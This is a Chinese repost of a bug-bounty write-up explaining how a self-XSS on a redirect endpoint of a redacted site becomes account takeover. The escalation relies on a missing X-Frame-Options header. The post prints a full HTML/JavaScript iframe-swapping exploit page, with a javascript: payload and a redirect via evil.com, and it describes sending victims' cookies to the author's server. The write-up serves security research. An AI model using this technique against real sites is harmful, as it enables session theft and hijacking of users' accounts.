Loading [MathJax]/jax/input/TeX/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >如何使用Self XSS导致账户接管

如何使用Self XSS导致账户接管

作者头像
Khan安全团队
发布于 2021-03-10 07:56:07
发布于 2021-03-10 07:56:07
1K00
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

账户接管功能

你好,我已经很久没有分享我最近的研究/发现了,但在这篇报道中,我将分享我发现的一个漏洞,这对我来说相当有趣,可能会改变你对 "SELF XSS "的看法。

我通常,当我真的要寻找漏洞时,我会手动检查任何应用程序,如开放重定向或XSS,以找到其他黑客的非凡工具可能会忽略的参数

所以,当我通过很多不同的终端和模糊通过很多不同的参数,我没有找到任何我感兴趣的东西,因为该程序是一个4年的老程序,经过很多专业的研究人员测试,但我不知道为什么我真的想找到一个漏洞在这个目标,因为我的朋友Kartik Sharma发现了一个非常酷的存储XSS在这个目标上,这导致大规模的帐户接管ps:(拍摄他的DM和必须要求他写关于它的文章

让我们回到正题,在这个目标上来回花了很多天时间,我终于遇到了一个看起来像https://redacted.com/redirect/<url-path>的端点,这是一个简单的开放重定向,等等,甚至不是开放重定向,因为它给出了这样的警告信息

现在,出于好奇,我把端点从https://redacted.com/redirect/javascript:alert(1)改成了https://redacted.com/redirect/javascript:alert(1),然后按了继续选项,看看会发生什么,然后弹出了alert(1),如下图所示

具有挑战性的方面

但是,这里是具有挑战性的一面。为了确定,我复制了端点是https://redacted.com/redirect/javascript:alert(1),然后在不同的浏览器中打开,继续到网站的选项消失了,如下图所示

导致从这一点上看,0影响漏洞,甚至连合法的自XSS都没有。如果你不明白这种行为,让我来解释一下那些没有得到它的人,这是因为regex正在检测特殊字符,如" ' > * />,并删除继续网站选项,一旦它检测到任何特殊字符后/#redirect,这意味着我来到了像死胡同的情况。

现在,利用的部分是检查端点,即:https://redacted.com/redirect/javascript:alert(1)是否启用了X-FRAME OPTIONS,我很幸运,是的,这个端点没有启用X-FRAME OPTIONS,这意味着我可以写一个js代码,并将其托管在我的网站上,并进一步利用这个漏洞 :D 没有得到它?让我简单解释一下。

所以,我是这样做的 写了这个javascript代码,并将端点托管在我的服务器上的iframe中,由我的javascript代码控制

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
html
<html>
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>Changing Pages... Please Wait</title>
    </head>
    <body>
        <iframe src="" name="frame" id="frame" width="100%" height="100%"></iframe>
        <script type="text/javascript">
            var frames = Array('https://redacted.com/#/redirect/https://@evil.com\\@www.redacted.com', 3,
                'https://redacted.com/#/redirect/javascript:alert(document.domain)', 37);
            var i = 0, len = frames.length;
            function ChangeSrc()
{
            document.getElementById('frame').src = frames[i++];
            if (i >= len) return; // no more changing
            setTimeout('ChangeSrc()', (frames[i++]*1000));
            }
            window.onload = ChangeSrc();
</script>
    </body>
</html>

所以基本上,这个漏洞现在会利用缺失的X-Frame-Options头,允许任何页面加载到iframe中。一旦页面被加载到iframe中,我们调用ChangeSrc()函数,将有效的URL https://redacted.com/#/redirect/https:///\/@www.redacted.com替换为一个易受攻击的URL,即https://redacted.com/#/redirect/javascript:alert(document.cookie)。由于不涉及服务器端的交互,并且URL在页面加载后被替换,当点击继续按钮时,我们可以看到XSS有效载荷与用户的cookie一起被发射(如下图所示)。

现在,这创造了一个影响的方式,这意味着当一个认证用户访问我的托管服务器,他/她的认证cookie将弹出,并将被发送到我的服务器,这意味着帐户接管redacted.com的任何用户。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-02-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
​从 JS 文件分析到 XSS 的一种方法
在研究其他漏洞赏金计划时,在 cmp3p.js 文件中发现了跨站点脚本漏洞,该漏洞允许攻击者在包含上述脚本的域上下文中执行任意 javascript 代码。
信安百科
2023/10/02
4750
​从 JS 文件分析到 XSS 的一种方法
解决 DOM XSS 难题
基于 DOM 的跨站点脚本 (XSS) 漏洞是我最喜欢利用的漏洞之一。这有点像解谜;有时你会得到一个角落,比如$.html(),其他时候你必须依靠反复试验。我最近在 bug 赏金计划中遇到了两个有趣postMessage的 DOM XSS 漏洞,这些漏洞让我解谜的痒痒。
Khan安全团队
2022/02/04
2.1K0
XSS挖掘工具资源分享
网e渗透安全部
2024/05/18
2070
XSS挖掘工具资源分享
2024全网最全面及最新且最为详细的网络安全技巧 七之 XSS漏洞典例分析EXP以及 如何防御和修复[含JAVASCRIPT和HTML代码层面分析,代码都进行了详细的注释](2)———— 作者:LJS
7.5 Exploiting XSS with 20 characters limitation(蓝色为翻译)
盛透侧视攻城狮
2024/10/21
2160
2024全网最全面及最新且最为详细的网络安全技巧 七之 XSS漏洞典例分析EXP以及 如何防御和修复[含JAVASCRIPT和HTML代码层面分析,代码都进行了详细的注释](2)———— 作者:LJS
安全研究 | Facebook中基于DOM的XSS漏洞利用分析
概述 我们发现的第一个漏洞将允许一名恶意攻击者从facebook.com域名并通过postMessage来发送跨域消息。存在漏洞的终端节点将接收请求参数中用户可控制的内容,并使用postMessage中的发送消息来构建一个数据对象,该对象将与postMessage一起发送到已打开的窗口。接下来,我们所发现的第二个漏洞跟第一个漏洞有关,攻击者可以利用这个漏洞来根据Eventlistener接收到的表单提交数据来构造一个不安全的脚本。 从facebook.com源通过postMessage发送消息 存在漏洞的节
FB客服
2023/04/26
8240
安全研究 | Facebook中基于DOM的XSS漏洞利用分析
Google最新XSS Game Writeup
本文介绍了如何完成谷歌最新的XSSGame的过程,完成了这八个挑战就有机会获得Nexus 5x。实际上这八个挑战总体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。 第一关
FB客服
2018/02/24
1.1K0
Google最新XSS Game Writeup
干货 | 学习XSS从入门到熟悉
XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。
HACK学习
2021/06/24
4.8K0
干货 | 学习XSS从入门到熟悉
如何进行渗透测试XSS跨站攻击检测
国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲这个XSS是如何实现以及原理。
技术分享达人
2019/10/08
2.8K0
如何进行渗透测试XSS跨站攻击检测
XSS 到 payu.in 中的账户接管
嗨,我发现了一个基于 POST 的 XSS,然后我将其升级以在受害者访问我的网站时实现完全的帐户接管。所以这是一篇文章,我将在其中向您展示我是如何升级它的。
Khan安全团队
2022/01/23
9860
web前端安全相关
XSS, 即为(Cross Site Scripting), 中文名为跨站脚本攻击
打野小王子
2019/03/28
1.1K0
web前端安全相关
浅谈XSS&Beef
本文章产生的缘由是因为专业老师,让我给本专业的同学讲一哈SQL注入和XSS入门,为了备课,于是产生了这篇文章。
小简
2022/12/29
6.6K0
浅谈XSS&Beef
渗透|一次从子域名接管到RCE的渗透经历
一次从子域名接管到RCE的渗透经历 前言 本文接触过作者的一次奇妙的实战经历,从子域名接管到上传Shell提权,将信息泄露漏洞和xss漏洞最终发展成rce。本文由当时存在语雀中的零散的渗透记录整理...
亿人安全
2023/12/14
6170
渗透|一次从子域名接管到RCE的渗透经历
URL 跳转漏洞的利用技巧
URL跳转漏洞仅是重定向到另一个网址,如: https://www.example.com/?go=https://www.google.com/ 当我们访问这个url时,将从example.com
HACK学习
2019/08/05
4.9K0
web漏洞 | XSS(跨站攻击脚本)详解
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击! XSS分为:存储型 、反射型 、DOM型XSS
谢公子
2022/01/13
5.1K0
web漏洞 | XSS(跨站攻击脚本)详解
XSS的一些基本概念
若两个URL 协议,端口,host都相同,则这两个URL同源。 这个方案叫做“协议/主机/端口元组”,或者直接是 “元组”
ConsT27
2022/02/11
1.2K0
XSS的一些基本概念
浅谈前端安全
安全问题的分类 按照所发生的区域分类 后端安全问题:所有发生在后端服务器、应用、服务当中的安全问题 前端安全问题:所有发生在浏览器、单页面应用、Web页面当中的安全问题 按照团队中哪个角色最适合来修复安全问题分类 后端安全问题:针对这个安全问题,后端最适合来修复 前端安全问题:针对这个安全问题,前端最适合来修复 综合以上 前端安全问题:发生在浏览器、前端应用当中或者通常由前端开发工程师来对其进行修复的安全问题 浏览器安全 同源策略 是一种约定,是浏览器最核心也最基本的安全功能,限制了来自不同源的docum
pitaojin
2018/05/25
4.9K0
从Twitter的XSS漏洞构造出Twitter XSS Worm
2018年年中,当时我发现了一个Twitter的存储型XSS漏洞,该漏洞位于Twitter的犄角旮旯之处,一般人很难发现。重点在于,后来我又发现,这个存储型XSS漏洞可以被进一步构造形成一个稳定的XSS worm!
FB客服
2019/05/23
1.7K0
Web安全学习笔记 XSS上
XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。
Miloce
2022/09/28
5320
挖洞经验 | 看我如何通过子域名接管绕过Uber单点登录认证机制
Uber使用Amazon CloudFront CDN架构的网站saostatic.uber.com存在子域名安全漏洞,可被攻击者接管。另外,Uber近期部署在网站auth.uber.com上,基于Uber所有子域名cookie共享实现认证的单点登录系统(SSO)也存在安全问题,攻击者可通过入侵控制任意一个*.uber.com子域名进行会话cookie窃取。因此,这两个问题的综合应用将造成对Uber整个SSO系统的身份认证绕过,实现对所有Uber子域名网站的访问控制,影响甚大。目前,通过我的漏洞发现,U
FB客服
2018/02/28
2.8K0
挖洞经验 | 看我如何通过子域名接管绕过Uber单点登录认证机制
安全研究 | 由postMessage导致Facebook账户劫持的DOM XSS
利用第一个漏洞可以通过postMessage方式从facebook.com网站中发送跨域(cross-origin)消息,存在漏洞的路径会接收攻击者在请求参数中构造的控制内容,同时会以postMessage请求中提供的数据创建一个对象从而打开窗口。第二个漏洞与第一个漏洞相关,其影响为可以构造不安全的脚本形成XSS,或者基于接收数据通过Eventlistener方式提交表单。 漏洞:通过postMessage方式从facebook.com网站中发送跨域(cross-origin)消息 存在漏洞的路径为http
FB客服
2023/04/26
9500
安全研究 | 由postMessage导致Facebook账户劫持的DOM XSS
推荐阅读
相关推荐
​从 JS 文件分析到 XSS 的一种方法
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验